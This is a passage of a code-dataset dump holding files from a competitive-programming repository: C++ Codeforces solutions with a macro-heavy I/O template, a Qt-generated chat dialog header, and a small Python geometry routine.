it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6616331338882446, "alphanum_fraction": 0.673378050327301, "avg_line_length": 44.846153259277344, "blob_id": "d563d936eed9d98c108614658586c582314bc875", "content_id": "875453394899f2b525b645fe7a1c10d3883b1620", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1788, "license_type": "no_license", "max_line_length": 165, "num_lines": 39, "path": "/staff/writeln.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef WRITELN\n#define WRITELN\n\n#include <iostream>\n#include <vector>\n#include <string>\n#include <sstream>\n\nusing namespace std;\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n#define wr(args...) err(ssplit(#args,',').begin(),args)\n\ninline void writeln2(){cout<<endl;}\ninline void writeln() {cout<<endl;}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s){priws(*f);for(auto i=++f;i!=s;++i)print(*i);}writeln();}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>ssplit(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.push_back(x);return v;}\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n\n#endif\n" }, { "alpha_fraction": 0.4881640374660492, "alphanum_fraction": 0.5075489282608032, "avg_line_length": 34.766666412353516, "blob_id": "7a0a50f89f21ece9409422fe49605e04f8db78a4", "content_id": "9576c5e8d8e25e14676644bed65049a84953c5f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5365, "license_type": "no_license", "max_line_length": 163, "num_lines": 150, "path": "/CodeForce/1089/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(a, b);\n vector<pii> scores = {{3, 0}, {3, 1}, {3, 2}, {2, 3}, {1, 3}, {0, 3}};\n for (auto& [f, s]: scores)\n {\n int cf = 0;\n int cs = 0;\n int n = f + s;\n vector<pii> score(n);\n if (s > f)\n {\n fori(f) score[i] = {25, 0}, cf += 25;\n fori(s) score[i + f] = {0, 25}, cs += 25;\n }\n else\n {\n fori(s) score[i] = {0, 25}, cs += 25;\n fori(f) score[i + s] = {25, 0}, cf += 25;\n }\n if (n == 5)\n {\n auto& [lf, ls] = score.back();\n if (lf) lf -= 10, cf -= 10;\n else ls -= 10, cs -= 10;\n }\n auto check = [&a, &b, &n](vector<pii> currScore, int cf, int cs, int index) {\n if (index < n)\n {\n if (currScore[index].first)\n currScore[index].second = currScore[index].first - 2,\n cs += currScore[index].second;\n else\n currScore[index].first = currScore[index].second - 2,\n cf += currScore[index].first;\n auto diff = max(min(a - cf, b - cs), 0);\n currScore[index].first += diff,\n currScore[index].second += diff,\n cf += diff,\n cs += diff;\n }\n\n fori(n)\n while (cf < a && currScore[i].first + 2 < currScore[i].second)\n currScore[i].first++,\n cf++;\n fori(n)\n while (cs < b && currScore[i].second + 2 < currScore[i].first)\n currScore[i].second++,\n cs++;\n //printf(\"%d %d:%d\\n\", index, cf, cs);\n //fori(n)\n //printf(\"%d:%d%c\", currScore[i].first, currScore[i].second, \" \\n\"[i == n - 1]);\n\n if (cf == a && cs == b)\n return currScore;\n else\n return vector<pii>();\n };\n forj(n + 1)\n if (auto currScore = check(score, cf, cs, j); currScore.size())\n {\n printf(\"%d:%d\\n\", f, s);\n fori(n)\n printf(\"%d:%d%c\", currScore[i].first, currScore[i].second, \" \\n\"[i == n - 1]);\n return;\n }\n }\n \n writeln(\"Impossible\");\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n //ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n ints(t);\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&& a){cout<<\" \"<<a;}\nttti void priws(T&& a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6016916632652283, "alphanum_fraction": 0.6701268553733826, "avg_line_length": 35.125, "blob_id": "8b3cb2ab14226cf593d9f92688f3b601fd08127a", "content_id": "92a987868b1a6b06fba5cbd673b6d627893dff10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5202, "license_type": "no_license", "max_line_length": 275, "num_lines": 144, "path": "/study/ChatNotDemo/ui_chatdialog.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "/********************************************************************************\n** Form generated from reading UI file 'chatdialog.ui'\n**\n** Created by: Qt User Interface Compiler version 5.15.2\n**\n** WARNING! All changes made in this file will be lost when recompiling UI file!\n********************************************************************************/\n\n#ifndef UI_CHATDIALOG_H\n#define UI_CHATDIALOG_H\n\n#include <QtCore/QVariant>\n#include <QtWidgets/QApplication>\n#include <QtWidgets/QDialog>\n#include <QtWidgets/QHBoxLayout>\n#include <QtWidgets/QLabel>\n#include <QtWidgets/QLineEdit>\n#include <QtWidgets/QListWidget>\n#include <QtWidgets/QPushButton>\n#include <QtWidgets/QTextEdit>\n#include <QtWidgets/QVBoxLayout>\n\nQT_BEGIN_NAMESPACE\n\nclass Ui_ChatDialog\n{\npublic:\n QVBoxLayout *vboxLayout;\n QHBoxLayout *horizontalLayout_2;\n QPushButton *History;\n QHBoxLayout *hboxLayout;\n QTextEdit *textEdit;\n QListWidget *listWidget;\n QHBoxLayout *hboxLayout1;\n QLabel *label;\n QLineEdit *lineEdit;\n QPushButton *pushButton;\n\n void setupUi(QDialog *ChatDialog)\n {\n if (ChatDialog->objectName().isEmpty())\n ChatDialog->setObjectName(QString::fromUtf8(\"ChatDialog\"));\n ChatDialog->resize(704, 529);\n vboxLayout = new QVBoxLayout(ChatDialog);\n#ifndef Q_OS_MAC\n vboxLayout->setSpacing(6);\n#endif\n#ifndef Q_OS_MAC\n vboxLayout->setContentsMargins(9, 9, 9, 9);\n#endif\n vboxLayout->setObjectName(QString::fromUtf8(\"vboxLayout\"));\n horizontalLayout_2 = new QHBoxLayout();\n horizontalLayout_2->setObjectName(QString::fromUtf8(\"horizontalLayout_2\"));\n horizontalLayout_2->setContentsMargins(-1, 8, -1, -1);\n History = new QPushButton(ChatDialog);\n History->setObjectName(QString::fromUtf8(\"History\"));\n History->setMaximumSize(QSize(16777215, 16777215));\n History->setFocusPolicy(Qt::NoFocus);\n\n horizontalLayout_2->addWidget(History);\n\n\n vboxLayout->addLayout(horizontalLayout_2);\n\n hboxLayout = new QHBoxLayout();\n#ifndef Q_OS_MAC\n hboxLayout->setSpacing(6);\n#endif\n hboxLayout->setContentsMargins(0, 0, 0, 0);\n hboxLayout->setObjectName(QString::fromUtf8(\"hboxLayout\"));\n textEdit = new QTextEdit(ChatDialog);\n textEdit->setObjectName(QString::fromUtf8(\"textEdit\"));\n textEdit->setMouseTracking(false);\n textEdit->setFocusPolicy(Qt::NoFocus);\n textEdit->setReadOnly(true);\n\n hboxLayout->addWidget(textEdit);\n\n listWidget = new QListWidget(ChatDialog);\n listWidget->setObjectName(QString::fromUtf8(\"listWidget\"));\n QSizePolicy sizePolicy(QSizePolicy::Expanding, QSizePolicy::Expanding);\n sizePolicy.setHorizontalStretch(0);\n sizePolicy.setVerticalStretch(0);\n sizePolicy.setHeightForWidth(listWidget->sizePolicy().hasHeightForWidth());\n listWidget->setSizePolicy(sizePolicy);\n listWidget->setMaximumSize(QSize(180, 16777215));\n listWidget->setFocusPolicy(Qt::NoFocus);\n\n hboxLayout->addWidget(listWidget);\n\n\n vboxLayout->addLayout(hboxLayout);\n\n hboxLayout1 = new QHBoxLayout();\n#ifndef Q_OS_MAC\n hboxLayout1->setSpacing(6);\n#endif\n hboxLayout1->setContentsMargins(0, 0, 0, 0);\n hboxLayout1->setObjectName(QString::fromUtf8(\"hboxLayout1\"));\n label = new QLabel(ChatDialog);\n label->setObjectName(QString::fromUtf8(\"label\"));\n\n hboxLayout1->addWidget(label);\n\n lineEdit = new QLineEdit(ChatDialog);\n lineEdit->setObjectName(QString::fromUtf8(\"lineEdit\"));\n\n hboxLayout1->addWidget(lineEdit);\n\n pushButton = new QPushButton(ChatDialog);\n pushButton->setObjectName(QString::fromUtf8(\"pushButton\"));\n pushButton->setFocusPolicy(Qt::TabFocus);\n\n hboxLayout1->addWidget(pushButton);\n\n\n vboxLayout->addLayout(hboxLayout1);\n\n\n retranslateUi(ChatDialog);\n QObject::connect(History, SIGNAL(clicked()), ChatDialog, SLOT(clearHistory()));\n QObject::connect(lineEdit, SIGNAL(editingFinished()), ChatDialog, SLOT(returnPressed()));\n QObject::connect(pushButton, SIGNAL(clicked()), ChatDialog, SLOT(returnPressed()));\n\n QMetaObject::connectSlotsByName(ChatDialog);\n } // setupUi\n\n void retranslateUi(QDialog *ChatDialog)\n {\n ChatDialog->setWindowTitle(QCoreApplication::translate(\"ChatDialog\", \"\\320\\247\\320\\260\\321\\202\", nullptr));\n History->setText(QCoreApplication::translate(\"ChatDialog\", \"\\320\\276\\321\\207\\320\\270\\321\\201\\321\\202\\320\\270\\321\\202\\321\\214 \\320\\270\\321\\201\\321\\202\\320\\276\\321\\200\\320\\270\\321\\216 \\321\\201\\320\\276\\320\\276\\320\\261\\321\\211\\320\\265\\320\\275\\320\\270\\320\\271\", nullptr));\n label->setText(QCoreApplication::translate(\"ChatDialog\", \"\\320\\241\\320\\276\\320\\276\\320\\261\\321\\211\\320\\265\\320\\275\\320\\270\\320\\265:\", nullptr));\n pushButton->setText(QCoreApplication::translate(\"ChatDialog\", \"\\320\\276\\321\\202\\320\\277\\321\\200\\320\\260\\320\\262\\320\\270\\321\\202\\321\\214\", nullptr));\n } // retranslateUi\n\n};\n\nnamespace Ui {\n class ChatDialog: public Ui_ChatDialog {};\n} // namespace Ui\n\nQT_END_NAMESPACE\n\n#endif // UI_CHATDIALOG_H\n" }, { "alpha_fraction": 0.37775060534477234, "alphanum_fraction": 0.42665037512779236, "avg_line_length": 23.058822631835938, "blob_id": "dc9dba1a69db3352b8cd0377b0b96a45a7ffcd0b", "content_id": "35511e0ce675b915412cc25b07c838ea47d8c8f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 818, "license_type": "no_license", "max_line_length": 96, "num_lines": 34, "path": "/2022/sberFinal/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#\n# Implement function get_result\n#\n\ndef orientation(ax, ay, bx, by, cx, cy):\n return ax*by-ay*bx-ax*cy+ay*cx+bx*cy-by*cx\ndef get(x):\n if x >= 0:\n return 1\n return -1\ndef get_result(a):\n n = len(a)\n used = [0 for i in range(n)]\n ans = 0\n for i in range(0, n, 2):\n if used[i] == 1:\n continue\n used[i] = 1\n ans += 1\n for j in range(i, n, 2):\n if used[j] == 1:\n continue\n\n bx = get(a[i])\n by = get(a[i + 1])\n cx = get(a[j])\n cy = get(a[j + 1])\n if bx == cx and by == cy and orientation(0, 0, a[i], a[i + 1], a[j], a[j + 1]) == 0:\n used[j] = 1\n\n return ans\n\nprint(get_result([2, 2, -2, 2, -2, -2, 2, -2]))\nprint(get_result([2,2,-2,2,-2,-2,2,-2,1,1,-1,3]))\n" }, { "alpha_fraction": 0.4224448800086975, "alphanum_fraction": 0.4376753568649292, "avg_line_length": 29.613496780395508, "blob_id": "8f27e97cab169de8151f25c8141068360f0e2a91", "content_id": "f3f91294ac0375dfe04dbdc4a4d6978bef83f49d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4990, "license_type": "no_license", "max_line_length": 174, "num_lines": 163, "path": "/CodeForce/1450/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, m);\n vector<vector<pii>> g(n);\n fori(m)\n {\n ints(u, v, b); --u; --v;\n g[u].pb({v, b});\n g[v].pb({u, -b});\n }\n int answer = -1;\n vector<int> qqq;\n fori(n)\n {\n bool ok = true;\n vector<pii> edges;\n queue<int> q;\n q.push(i);\n vector<int> d(n, MOD), tuda(n), suda(n), tt(n, 0), ss(n, 0);\n d[i] = 0;\n while (q.size())\n {\n int u = q.front();\n q.pop();\n forj(g[u].size()) \n {\n auto [v, b] = g[u][j];\n if (d[v] + 1 == d[u]) continue;\n\n if (d[v] != MOD && d[u] + 1 != d[v]) //odd cycle\n {\n //writeln(\"FAIL\", u + 1, v + 1, d[u], d[v]); cout.flush();\n ok = false;\n break;\n }\n else\n {\n if (d[v] == MOD)\n d[v] = d[u] + 1,\n q.push(v);\n tuda[v] = max(tuda[v], tuda[u] + (b == 1));\n suda[v] = max(suda[v], suda[u] + (b == -1));\n edges.pb({u, j});\n }\n }\n }\n //writeln(i + 1);\n //writeln(d);\n //writeln(tuda);\n //writeln(suda);\n forj(n)\n ok &= tuda[j] + suda[j] <= d[j];\n if (!ok)\n continue;\n reverse(all(edges));\n for (auto [u, j]: edges)\n {\n auto& [v, b] = g[u][j];\n if (b == 1)\n tt[u]++;\n else if (b == -1)\n ss[u]++;\n else\n if (tuda[v] > ss[u])\n ss[u]++,\n b = -1;\n else\n tt[u]++,\n b = 1;\n }\n vector<int> ans(n, MOD);\n ans[i] = 0;\n q.push(i);\n while (q.size())\n {\n int u = q.front();\n q.pop();\n for (auto [v, b]: g[u])\n if (ans[v] == MOD)\n ans[v] = ans[u] + b,\n q.push(v);\n else\n if (ans[v] != ans[u] + 1 && ans[u] != ans[v] + 1)\n ok = false;\n }\n\n //writeln(tuda);\n //writeln(suda);\n if (!ok) continue;\n int mn = *min_element(all(ans));\n for (int& x: ans)\n x -= mn;\n int mx = *max_element(all(ans));\n if (mx > answer)\n answer = mx,\n qqq = ans;\n //writeln(ans);\n //writeln();\n cout.flush();\n }\n if (answer == -1)\n writeln(\"NO\");\n else\n writeln(\"YES\"),\n writeln(answer),\n writeln(qqq);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4631134271621704, "alphanum_fraction": 0.47524645924568176, "avg_line_length": 27.229358673095703, "blob_id": "ec9f044bb405aa26d8d5b27518e49fa5355926dc", "content_id": "3f78f5bf39ee2eb1ec5010803d76e1cb995f20e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9231, "license_type": "no_license", "max_line_length": 174, "num_lines": 327, "path": "/CodeForce/1576/A29.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#ifdef ONLINE_JUDGE\n#pragma GCC optimize(\"Ofast\")\n#endif\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//}}}\n\n[[maybe_unused]] const int GFL = 100;\n[[maybe_unused]] const int NFL = 200;\n\nstruct edge // {{{\n{\n int id;\n int g;\n int from;\n int to;\n int d;\n int c;\n int now = 0;\n\n int getTo(int u) const\n {\n return from ^ to ^ u;\n }\n\n edge() {}\n\n friend istream& operator>>(istream& in, edge& e) {\n return in >> e.id >> e.g >> e.from >> e.to >> e.d >> e.c;\n }\n \n friend ostream& operator<<(ostream& out, const edge& e) {\n return out << \"Edge: \" << e.id << \", g \" << e.g << \", from \" << e.from << \", to \" << e.to << \", d \" << e.d << \", c \" << e.c << \", now \" << e.now;\n }\n};\n\nstruct node\n{\n int id;\n vector<int> out;\n unordered_set<int> restrictions;\n int now = 0;\n\n node() {}\n\n void addRestriction(int fromEdge, int toEdge)\n {\n restrictions.insert(getHash(fromEdge, toEdge));\n }\n\n int getHash(int fromEdge, int toEdge) const\n {\n return (min(fromEdge, toEdge) << 16) + max(fromEdge, toEdge);\n }\n\n bool can(int fromEdge, int toEdge) const \n {\n if (fromEdge == -1 || toEdge == -1) return true;\n return restrictions.count(getHash(fromEdge, toEdge)) == 0;\n }\n\n friend ostream& operator<<(ostream& out, const node& e) {\n return out << \"Node \" << e.id << \", out \" << e.out.size() << \", restrictions \" << e.restrictions.size() << \", now \" << e.now;\n }\n\n};\n\nstruct flow\n{\n int id;\n int from;\n int to;\n int r;\n bool use = false;\n vector<int> path;\n\n flow() {}\n\n friend istream& operator>>(istream& in, flow& e) {\n return in >> e.id >> e.from >> e.to >> e.r;\n }\n \n friend ostream& operator<<(ostream& out, const flow& e) {\n return out << \"Flow \" << e.id << \", from \" << e.from << \", to \" << e.to << \", rate \" << e.r;\n }\n\n};\n\nstruct group\n{\n int now = 0;\n\n group() {}\n}; // }}}\n\nvoid run()\n{\n double time = clock();\n ints(n, m, c, F); int g = 4500;\n vector<node> nodes(n);\n fori(n) nodes[i].id = i;\n vector<edge> edges(m);\n vector<flow> flows(F);\n vector<group> groups(g + 1);\n\n { //READ INPUT\n readln(edges);\n for (const auto& e: edges)\n nodes[e.from].out.pb(e.id),\n nodes[e.to].out.pb(e.id);\n forn(q, c)\n {\n ints(id, u, v);\n nodes[id].addRestriction(u, v);\n }\n readln(flows);\n fori(n)\n shuffle(all(nodes[i].out), rng);\n\n\n //writeln(nodes);\n //writeln(edges);\n //writeln(flows);\n }\n\n auto checkCannotUseEdge = [&](int u, int v, int fromEdge, const flow& f, const edge& e) {\n return groups[e.g].now == GFL || nodes[v].now == NFL || e.now + f.r > e.c || !nodes[u].can(e.id, fromEdge);\n };\n\n vector<int> d(n, MOD);\n vector<pii> p(n, {-1, -1});\n vector<bool> used(n, false);\n auto getPath = [&](const flow& f) {\n fori(n)\n d[i] = MOD,\n p[i] = {-1, -1},\n used[i] = false;\n d[f.from] = 0;\n if (nodes[f.from].now == NFL) return vector<int>();\n if (nodes[f.to].now == NFL) return vector<int>();\n\n auto bfs = [&]() {\n queue<tuple<int, int, int>> s;\n s.push({0, f.from, -1});\n while (s.size())\n {\n auto [_, u, fromEdge] = s.front();\n s.pop();\n //s.erase(s.begin());\n used[u] = true;\n if (u == f.to) break;\n for (const int& eid: nodes[u].out)\n {\n const auto& e = edges[eid];\n int v = e.getTo(u);\n if (used[v] || checkCannotUseEdge(u, v, fromEdge, f, e))\n continue;\n int cur = d[u] + 1;\n if (cur < d[v])\n {\n d[v] = cur;\n p[v] = {u, e.id};\n s.push({d[v], v, e.id});\n }\n }\n }\n };\n\n bfs();\n if (d[f.to] == MOD)\n return vector<int>();\n\n vector<int> path;\n int u = f.to;\n while (u != -1 && p[u].second != -1)\n path.pb(p[u].second),\n u = p[u].first;\n reverse(all(path));\n return path;\n };\n\n auto applyPath = [&](flow& f) {\n unordered_set<int> ggg;\n int u = f.from;\n for (int& eid: f.path)\n {\n edge& e = edges[eid];\n e.now += f.r;\n nodes[u].now++;\n u = e.getTo(u);\n ggg.insert(e.g);\n }\n for (int gg: ggg)\n groups[gg].now++;\n nodes[u].now++;\n };\n\n sort(all(flows), [](const flow& a, const flow& b) {\n return a.r < b.r;\n });\n fori((7 * F + 7) / 8)\n flows[i].use = true;\n shuffle(all(flows), rng);\n\n //int i = 0;\n for (auto& f: flows)\n if (f.use)\n {\n \n if (1000.0 * (clock() - time) / CLOCKS_PER_SEC > 1950)\n break;\n //if (++i % 100 == 99)\n //cerr << i << \"/\" << F << endl;\n const auto path = getPath(f);\n if (!path.size())\n continue;\n f.path = path;\n applyPath(f);\n }\n\n //writeln(nodes);\n //writeln(edges);\n int ans = 0;\n { //PRINT ANSWER\n for (const auto& f: flows) ans += f.path.size() != 0;\n writeln(ans);\n for (const auto& f: flows) if (f.path.size()) writeln(f.id, f.path);\n\n }\n\n#ifndef ONLINE_JUDGE\n {\n vector<int> E(m);\n vector<int> N(n);\n vector<set<int>> G(g + 1);\n for (const auto& f: flows)\n {\n if (!f.path.size()) continue;\n set<int> nodesPerPath;\n set<int> edgesPerPath;\n int u = f.from;\n\n for (auto& eid: f.path)\n {\n auto e = edges[eid];\n E[eid] += f.r;\n N[u]++;\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n G[e.g].insert(f.id);\n if (!edgesPerPath.insert(eid).second)\n writeln(\"EDGE\", eid, \"ALREADY EXISTS IN FLOW\", f.id);\n u = e.getTo(u);\n }\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n N[u]++;\n }\n fori(m)\n if (E[i] > edges[i].c)\n writeln(\"ERROR EDGE CAPACITY\", i, \"EXPECTED <=\", edges[i].c, \"FOUND\", E[i]);\n fori(n)\n if (N[i] > NFL)\n writeln(\"ERROR NODE FLOW LIMIT\", i, \"EXPECTED <=\", NFL, \"FOUND\", N[i]);\n fori(g + 1)\n if (G[i].size() > GFL)\n writeln(\"ERROR GROUP FLOW LIMIT\", i, \"EXPECTED <=\", GFL, \"FOUND\", G[i].size());\n\n cerr << ans << endl;\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n }\n#endif\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.39431238174438477, 